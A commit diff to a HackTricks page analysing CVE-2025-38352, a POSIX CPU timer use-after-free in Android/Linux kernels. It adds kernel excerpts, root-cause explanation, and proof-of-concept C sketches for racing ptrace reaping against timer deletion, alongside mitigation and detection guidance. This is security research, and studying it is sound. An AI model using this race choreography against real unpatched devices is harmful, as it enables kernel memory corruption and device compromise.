
Commit a807923

Merge pull request #1706 from HackTricks-wiki/update_CVE-2025-38352___In-the-wild_Android_Kernel_Vulner_20251222_130353
CVE-2025-38352 – In-the-wild Android Kernel Vulnerability An...
2 parents e6abd74 + 57a200a commit a807923

File tree

1 file changed: +123 -4 lines changed


src/linux-hardening/privilege-escalation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md

Lines changed: 123 additions & 4 deletions
@@ -80,6 +80,9 @@ Two expiry-processing modes
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry handled directly in IRQ context

<details>
<summary>Task_work vs IRQ expiry paths</summary>

```c
void run_posix_cpu_timers(void) {
    struct task_struct *tsk = current;
@@ -100,8 +103,13 @@ static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
#endif
```

</details>

In the IRQ-context path, the firing list is processed outside the sighand lock:

<details>
<summary>IRQ-context delivery loop</summary>

```c
static void handle_posix_cpu_timers(struct task_struct *tsk) {
    struct k_itimer *timer, *next;
    unsigned long flags, start;
@@ -126,6 +134,8 @@ static void handle_posix_cpu_timers(struct task_struct *tsk) {
}
```

</details>

Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit
Preconditions
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ path in use)
@@ -139,6 +149,52 @@ Sequence
4) Immediately after unlock, the exiting task can be reaped; a sibling thread executes posix_cpu_timer_del().
5) In this window, posix_cpu_timer_del() may fail to acquire state via cpu_timer_task_rcu()/lock_task_sighand() and thus skip the normal in-flight guard that checks timer->it.cpu.firing. Deletion proceeds as if the timer were not firing, corrupting state while expiry is still being handled and leading to crashes/UB.
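
For orientation, the in-flight guard referenced in step 5 sits on the normal deletion path. The following is a simplified paraphrase of that path (helper names such as disarm_timer() vary between kernel versions), not a verbatim excerpt:

```c
/* Paraphrased normal path of posix_cpu_timer_del(): only reachable when
 * lock_task_sighand() succeeded. If the lock fails (task being reaped),
 * this whole check is skipped and deletion continues blindly. */
if (timer->it.cpu.firing)
    ret = TIMER_RETRY;        /* expiry in flight: caller must retry later */
else
    disarm_timer(timer, p);   /* safe: timer is not mid-delivery */
unlock_task_sighand(p, &flags);
```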

### How release_task() and timer_delete() free firing timers
Even after handle_posix_cpu_timers() has taken the timer off the task list, a ptraced zombie can still be reaped. The waitpid() stack drives release_task() → __exit_signal(), which tears down sighand and the signal queues while another CPU is still holding pointers to the timer object:

```c
static void __exit_signal(struct task_struct *tsk)   // abridged from kernel/exit.c
{
    struct sighand_struct *sighand = rcu_dereference(tsk->sighand);

    spin_lock(&sighand->siglock);
    // ... signal/timer cleanup elided ...
    tsk->sighand = NULL; // makes future lock_task_sighand() fail
    spin_unlock(&sighand->siglock);
}
```

With sighand detached, timer_delete() still returns success because posix_cpu_timer_del() leaves `ret = 0` when locking fails, so the syscall proceeds to free the object via RCU:

```c
static int posix_cpu_timer_del(struct k_itimer *timer)
{
    struct task_struct *p = cpu_timer_task_rcu(timer); // abridged: NULL check elided
    unsigned long flags;
    int ret = 0;

    struct sighand_struct *sighand = lock_task_sighand(p, &flags);
    if (unlikely(!sighand))
        goto out; // ret stays 0 -> userland sees success
    // ... normal unlink path (checks it.cpu.firing, see above) ...
out:
    return ret;
}
```

```c
SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
{
    unsigned long flags;
    struct k_itimer *timer = lock_timer(timer_id, &flags); // abridged: error handling elided

    if (timer_delete_hook(timer) == TIMER_RETRY)
        timer = timer_wait_running(timer, &flags);
    posix_timer_unhash_and_free(timer); // call_rcu(k_itimer_rcu_free)
    return 0;
}
```

Because the slab object is RCU-freed while IRQ context still walks the `firing` list, reuse of the timer cache becomes a UAF primitive.

### Steering reaping with ptrace + waitpid
The easiest way to keep a zombie around without it being auto-reaped is to ptrace a non-leader worker thread. exit_notify() first sets `exit_state = EXIT_ZOMBIE` and only transitions to EXIT_DEAD if `autoreap` is true. For ptraced threads, `autoreap = do_notify_parent()` remains false as long as SIGCHLD is not ignored, so release_task() only runs when the parent explicitly calls waitpid():

- Use pthread_create() inside the tracee so the victim is not the thread-group leader (wait_task_zombie() handles ptraced non-leaders).
- Parent issues `ptrace(PTRACE_ATTACH, tid)` and later `waitpid(tid, __WALL)` to drive do_wait_pid() → wait_task_zombie() → release_task().
- Pipes or shared memory convey the exact TID to the parent so the correct worker is reaped on demand.

This choreography guarantees a window where handle_posix_cpu_timers() can still reference `tsk->sighand`, while a subsequent waitpid() tears it down and allows timer_delete() to reclaim the same k_itimer object.

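A minimal user-space sketch of that attach/park/reap dance (hypothetical helper names; only standard ptrace()/waitpid() calls, error handling elided):

```c
#define _GNU_SOURCE
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Attach to the worker thread so it is NOT auto-reaped on exit.
 * `tid` is the kernel TID received from the child (e.g., over the c2p pipe). */
static void attach_and_park(pid_t tid) {
    int status;
    ptrace(PTRACE_ATTACH, tid, NULL, NULL);   /* tracee stops with SIGSTOP   */
    waitpid(tid, &status, __WALL);            /* consume the attach stop     */
    ptrace(PTRACE_CONT, tid, NULL, NULL);     /* let the worker run and exit */
}

/* Later, once the worker is an EXIT_ZOMBIE with a firing timer, this waitpid()
 * drives do_wait_pid() → wait_task_zombie() → release_task(), clearing tsk->sighand. */
static void reap_now(pid_t tid) {
    int status;
    waitpid(tid, &status, __WALL);
}
```
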
Why TASK_WORK mode is safe by design
- With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry is deferred to task_work; exit_task_work runs before exit_notify, so the IRQ-time overlap with reaping does not occur.
- Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.
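
The exit_state gating mentioned above boils down to an early return at the IRQ-time entry point. A sketch of the idea (paraphrasing the stable fix referenced at the end of this page, not the verbatim patch):

```c
void run_posix_cpu_timers(void)
{
    struct task_struct *tsk = current;

    lockdep_assert_irqs_disabled();

    /* Ensure release_task(tsk) cannot run while expiry is being handled:
     * otherwise a concurrent posix_cpu_timer_del() may fail to
     * lock_task_sighand(tsk) and miss timer->it.cpu.firing != 0. */
    if (tsk->exit_state)
        return;

    __run_posix_cpu_timers(tsk);
}
```
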
@@ -159,7 +215,18 @@ Impact

Triggering the bug (safe, reproducible conditions)
Build/config
- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix. On x86/arm64 the option is normally forced on via HAVE_POSIX_CPU_TIMERS_TASK_WORK, so researchers often patch `kernel/time/Kconfig` to expose a manual toggle:

```c
config POSIX_CPU_TIMERS_TASK_WORK
    bool "CVE-2025-38352: POSIX CPU timers task_work toggle" if EXPERT
    depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
    default y
```

This mirrors what Android vendors did for analysis builds; upstream x86_64 and arm64 force HAVE_POSIX_CPU_TIMERS_TASK_WORK=y, so the vulnerable IRQ path mainly exists on 32-bit Android kernels where the task_work option is compiled out.

- Run on a multi-core VM (e.g., QEMU `-smp cores=4`) so parent, child main, and worker threads can stay pinned to dedicated CPUs.

Runtime strategy
- Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):
@@ -191,9 +258,58 @@ void *deleter(void *arg) {

- Race amplifiers: high scheduler tick rate, CPU load, repeated thread exit/re-create cycles. The crash typically manifests when posix_cpu_timer_del() misses the firing flag because task lookup/locking fails right after unlock_task_sighand().

Detection and hardening
- Mitigation: apply the exit_state guard; prefer enabling CONFIG_POSIX_CPU_TIMERS_TASK_WORK when feasible.
- Observability: see “Instrumentation cues during exploitation” below.

### Practical PoC orchestration
#### Thread & IPC choreography
A reliable reproducer forks into a ptracing parent and a child that spawns the vulnerable worker thread. Two pipes (`c2p`, `p2c`) deliver the worker TID and gate each phase, while a `pthread_barrier_t` prevents the worker from arming its timer until the parent has attached. Each process or thread is pinned with `sched_setaffinity()` (e.g., parent on CPU1, child main on CPU0, worker on CPU2) to minimize scheduler noise and keep the race reproducible.

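As a concrete illustration of the pinning and TID hand-off described above (helper names are made up for this sketch; only standard glibc/syscall interfaces are used):

```c
#define _GNU_SOURCE
#include <sched.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Pin the calling thread to one CPU so parent, child main and worker
 * each stay on their own core (e.g., 1, 0 and 2 as described above). */
static void pin_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof(set), &set);   /* pid 0 = calling thread */
}

/* Hand the worker's kernel TID to the parent over the c2p pipe so the
 * parent can ptrace-attach and later reap exactly this thread. */
static void send_my_tid(int c2p_write_fd) {
    pid_t tid = (pid_t)syscall(SYS_gettid);
    write(c2p_write_fd, &tid, sizeof(tid));
}
```
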
#### Timer calibration with CLOCK_THREAD_CPUTIME_ID
The worker arms a per-thread CPU timer so that only its own CPU consumption advances the deadline. A tunable `wait_time` (default ≈250 µs of CPU time) plus a bounded busy loop ensure that `exit_notify()` sets `EXIT_ZOMBIE` while the timer is just about to fire:

<details>
<summary>Minimal per-thread CPU timer skeleton</summary>

```c
#include <pthread.h>
#include <signal.h>
#include <stdio.h>
#include <time.h>

static pthread_barrier_t barrier;   // shared with child main
static timer_t timer;
static long wait_time = 250000;     // nanoseconds of CPU time

static void timer_fire(sigval_t unused) {
    puts("timer fired");
}

static void *worker(void *arg) {
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_THREAD;
    sev.sigev_notify_function = timer_fire;
    timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer);

    struct itimerspec ts = {
        .it_interval = {0, 0},
        .it_value = {0, wait_time},
    };

    pthread_barrier_wait(&barrier); // released by child main after ptrace attach
    timer_settime(timer, 0, &ts, NULL);

    for (volatile int i = 0; i < 1000000; i++); // burn CPU before exiting
    return NULL; // thread exit (do_exit()) keeps consuming CPU time, so the timer can fire mid-exit
}
```

</details>

#### Race timeline
1. Child tells the parent the worker TID via `c2p`, then blocks on the barrier.
2. Parent `PTRACE_ATTACH`es, waits in `waitpid(__WALL)`, then `PTRACE_CONT` to let the worker run and exit.
3. When heuristics (or manual operator input) suggest the timer was collected into the IRQ-side `firing` list, the parent executes `waitpid(tid, __WALL)` again to trigger release_task() and drop `tsk->sighand`.
4. Parent signals the child over `p2c` so child main can call `timer_delete(timer)` and immediately run a helper such as `wait_for_rcu()` until the timer’s RCU callback completes.
5. IRQ context eventually resumes `handle_posix_cpu_timers()` and dereferences the freed `struct k_itimer`, tripping KASAN or WARN_ON()s.

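Steps 3–4 reduce to a handful of calls on each side; the sketch below assumes the pipe file descriptors and the `wait_for_rcu()` helper from the description above (error handling elided):

```c
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/* Parent (step 3): reap the zombie worker so release_task() clears
 * tsk->sighand, then green-light child main over the p2c pipe (step 4). */
static void parent_reap_and_signal(pid_t worker_tid, int p2c_write_fd) {
    int status;
    char go = 'D';
    waitpid(worker_tid, &status, __WALL);   /* drives release_task() */
    write(p2c_write_fd, &go, 1);
}

/* Child main (step 4): delete the timer whose expiry may still be walking
 * the IRQ-side firing list; timer_delete() reports success even though
 * lock_task_sighand() failed inside posix_cpu_timer_del(). */
static void child_delete_timer(int p2c_read_fd, timer_t t) {
    char cmd;
    read(p2c_read_fd, &cmd, 1);
    timer_delete(t);
    /* wait_for_rcu();  hypothetical helper: wait until the k_itimer's
                        RCU callback has actually freed the object */
}
```
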
#### Optional kernel instrumentation
For research setups, injecting a debug-only `mdelay(500)` inside handle_posix_cpu_timers() when `tsk->comm == "SLOWME"` widens the window so the above choreography almost always wins the race. The same PoC also renames threads (`prctl(PR_SET_NAME, ...)`) so kernel logs and breakpoints confirm the expected worker is being reaped.

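A sketch of what such a research-only hunk could look like (an assumption based on the description above, not an upstream patch; it must never ship in production kernels):

```c
/* Debug-only change inside handle_posix_cpu_timers(): stall threads named
 * "SLOWME" after the firing list has been collected, enlarging the window
 * in which waitpid()/timer_delete() can race the expiry path. */
if (!strcmp(tsk->comm, "SLOWME"))
    mdelay(500);   /* needs <linux/delay.h>; debug builds only */
```

On the user-space side, the worker calls `prctl(PR_SET_NAME, "SLOWME", 0, 0, 0)` right after starting, so the delay and any dmesg output are attributable to the intended thread.
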
### Instrumentation cues during exploitation
- Add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del() to spot cases where `it.cpu.firing==1` coincides with failed cpu_timer_task_rcu()/lock_task_sighand(); monitor timerqueue consistency when the victim exits (a minimal sketch follows below).
- KASAN typically reports `slab-use-after-free` inside posix_timer_queue_signal(), while non-KASAN kernels log WARN_ON_ONCE() from send_sigqueue() when the race lands, giving a quick success indicator.

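A minimal version of the first cue, assuming it is patched into posix_cpu_timer_del() on a research kernel (field names follow the excerpts above and may differ between versions):

```c
/* Research-kernel observability: warn once when deletion races IRQ-time
 * expiry, i.e. sighand is already gone but the timer is still marked firing. */
sighand = lock_task_sighand(p, &flags);
if (unlikely(!sighand)) {
    WARN_ONCE(timer->it.cpu.firing,
              "posix_cpu_timer_del: firing timer deleted without sighand (CVE-2025-38352 window)\n");
    goto out;   /* original behaviour preserved: ret stays 0 */
}
```
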
Audit hotspots (for reviewers)
- update_process_times() → run_posix_cpu_timers() (IRQ)
@@ -209,5 +325,8 @@ Notes for exploitation research
- [Race Against Time in the Kernel’s Clockwork (StreyPaws)](https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/)
- [Android security bulletin – September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
- [Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
- [CVE-2025-38352 – In-the-wild Android Kernel Vulnerability Analysis and PoC](https://faith2dxy.xyz/2025-12-22/cve_2025_38352_analysis/)
- [poc-CVE-2025-38352 (GitHub)](https://github.com/farazsth98/poc-CVE-2025-38352)
- [Linux stable fix commit f90fff1e152d](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f90fff1e152dedf52b932240ebbd670d83330eca)

{{#include ../../../banners/hacktricks-training.md}}
